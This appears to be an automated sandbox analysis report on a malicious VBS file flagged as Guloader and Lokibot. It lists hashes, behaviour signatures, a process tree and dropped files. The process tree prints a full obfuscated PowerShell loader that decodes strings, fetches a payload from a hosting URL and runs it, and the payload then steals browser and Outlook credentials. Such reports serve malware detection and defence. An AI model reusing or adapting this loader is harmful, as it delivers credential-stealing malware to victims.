Analysis

  • max time kernel
    143s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-09-2024 05:18

General

  • Target

    EX778415591042.vbs

  • Size

    10KB

  • MD5

    e54e9c9586d6eb1b032b97f5ced77204

  • SHA1

    d4ef79ae803dc0cbca9e180d9cf88cce6e8d08d7

  • SHA256

    c7cc1d7877c14667c21c56547ad84a8cd7d8def57789911a559d2a28399ae43b

  • SHA512

    7030de2b60b1cdb73bde04d83824de14c434828e050ba92e4d55a7f757453fb2567feed781cb6320b10cded7cb6630627540c2f8b8f941ce0ec039f539fd7400

  • SSDEEP

    192:PxDz2esQhSJLqvYLHHCsm1Bls6Vz06Clv5eVQzN8bzUik4JO7qI7m+:JJtSqqnHGDNCv5RzN8bzUiDJel1

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Lokibot

    Lokibot is a password and cryptocurrency wallet stealer.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EX778415591042.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? 
OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. 
TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. 
');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"
        3⤵
        PID:2904
        • C:\Windows\system32\cmd.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2460
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3008

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Jeunesse.slu

      Filesize

      445KB

      MD5

      8383998e368af99410a50d584700e574

      SHA1

      e4649baea84eb0e2447b3baa92e26679f006fd1d

      SHA256

      973f06e73b2965628d563d835b5e2b099f159c0ff3f1f1e139aa514b1bcefde1

      SHA512

      bc8de24ef4f920c49b0af99114eba2d7741c9d355c2f732e8bcb593b11d98d3989fa4990985691b3efee430b3df43f1fbf3f4c7d361883b5440af532c092968a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BJUJLSF4CVXXR4SB6R2X.temp

      Filesize

      7KB

      MD5

      2a2f697948cc229348b43645b6294be5

      SHA1

      4ee00c42f4d81e1828e2217a00f24be6b965c70c

      SHA256

      1c29cabcff036fc63cd26671312674d752b8ddfa5ab578b79f682165867e416d

      SHA512

      7ce863db6028e022d16d723d3dbfa9a72fb2195de967e2362802a8f69882a858e74aba5336a1e14c82564ab02f2c579f0038d08796e49968c4aa83fbc25990d6

    • memory/2112-19-0x0000000006260000-0x000000000A127000-memory.dmp

      Filesize

      62.8MB

    • memory/2116-8-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-9-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-10-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-11-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-13-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-14-0x000007FEF45FE000-0x000007FEF45FF000-memory.dmp

      Filesize

      4KB

    • memory/2116-4-0x000007FEF45FE000-0x000007FEF45FF000-memory.dmp

      Filesize

      4KB

    • memory/2116-7-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-6-0x0000000002410000-0x0000000002418000-memory.dmp

      Filesize

      32KB

    • memory/2116-46-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2116-5-0x000000001B270000-0x000000001B552000-memory.dmp

      Filesize

      2.9MB

    • memory/3008-22-0x0000000000970000-0x0000000004837000-memory.dmp

      Filesize

      62.8MB

    • memory/3008-44-0x0000000000970000-0x0000000004837000-memory.dmp

      Filesize

      62.8MB